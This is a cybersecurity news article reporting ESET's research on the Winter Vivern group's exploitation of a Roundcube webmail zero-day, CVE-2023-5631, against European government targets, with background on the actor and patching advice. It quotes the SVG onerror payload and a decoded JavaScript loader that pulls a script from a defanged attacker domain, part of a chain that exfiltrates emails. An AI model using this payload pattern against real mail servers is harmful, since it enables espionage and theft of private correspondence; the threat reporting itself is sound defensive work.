ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Jump to:

Technical details about this cyberattack exploiting a 0day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A

figure A ESET Roundcube.
Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, a SVG tag contains a base64-encoded malicious payload; this is hidden for the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The goal of the malicious code is to trigger the onerror attribute by using an invalid URL in the x parameter.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher could establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to ” … properly sanitize the malicious SVG document before being added to the HTML page interpreted by a Roundcube user,” as stated by Faou.

The vulnerability doesn’t need any interaction with the user other than viewing the message in a web browser, which maybe explains why the threat actor didn’t need to use a very complicated social engineering technique; any content viewed triggers the exploit.

After this initial execution of JavaScript code, a second-stage loader, also developed in JavaScript and named checkupdate.js, is being executed and triggers the final stage, once again written in JavaScript (Figure B).

Figure B

Figure B ESET Roundcube.
Part of the final JavaScript payload that exfiltrates emails from the victim. Image: ESET

The final payload provides the capability for the attacker to list all folders and emails in the current Roundcube email account in addition to exfiltrate email messages to a command and control server via HTTP requests.

When TechRepublic asked Faou about further compromise of the system, he replied via a written message: “We haven’t observed any lateral movement. The JavaScript code is only executed in the context of (the) victim’s browser, in the Roundcube window. So it doesn’t have access to the backend of Roundcube and escaping the browser would require a way more complicated exploit. However, they could re-use their access to launch further phishing campaigns originating from the sender who was compromised (we haven’t observed this).”

Who is Winter Vivern?

Winter Vivern, aka TA473, is a cyberespionage threat actor whose interests are closely aligned with the governments of Russia and Belarus. The first public exposure of the Winter Vivern threat actor occurred in 2021 when it targeted several governmental entities in different countries including Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine and the Vatican.

This threat actor has a history of exploiting webmail software, as it already abused older Roundcube vulnerabilities and known Zimbra webmail vulnerabilities to target elected officials and staffers in the U.S. as well as experts in European politics and economics. The threat actor also targeted mailboxes from NATO-aligned government entities in Europe.

The threat actor often uses malicious documents and sometimes a PowerShell backdoor to successfully compromise its targets. Winter Vivern uses vulnerability scanners such as Acunetix probably to scan targeted networks.

ESET noted that Winter Vivern has been observed exploiting CVE-2020-35730, which is a known Roundcube vulnerability against entities that are also targeted by threat actor APT28, which has been described as the military unit 26165 of Russia’s Military Intelligence Agency, previously known as GRU.

In addition, ESET pointed out a possible link to threat actor MoustachedBouncer, who runs attacks against foreign diplomats in Belarus. Asked about it, Faou told TechRepublic that “there are quite unique similarities in the network infrastructure of both groups, suggesting that a common entity might provide it to both of them.”

As stated by ESET, regarding the current threat, “Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.”

How to protect users from this cybersecurity threat

ESET reported the CVE-2023-5631 vulnerability to Roundcube on Oct. 12, 2023; Roundcube patched it on Oct. 14, 2023 and released security updates to address the vulnerability on Oct. 16, 2023 for versions 1.6.4, 1.4.15 and 1.5.5. It’s strongly advised to patch Roundcube for this vulnerability.

It’s recommended to keep all operating systems and software up to date and patched to avoid further compromise that could happen via common vulnerabilities.

Disabling JavaScript execution in the browser would mitigate this threat, yet it would greatly reduce the user’s experience because a lot of websites heavily rely on JavaScript to function.

Disclosure: I work for Trend Micro, but the views expressed in this article are mine.

Subscribe to the Cybersecurity Insider Newsletter

Strengthen your organization's IT security defenses by keeping abreast of the latest cybersecurity news, solutions, and best practices. Delivered every Monday, Tuesday and Thursday

Subscribe to the Cybersecurity Insider Newsletter

Strengthen your organization's IT security defenses by keeping abreast of the latest cybersecurity news, solutions, and best practices. Delivered every Monday, Tuesday and Thursday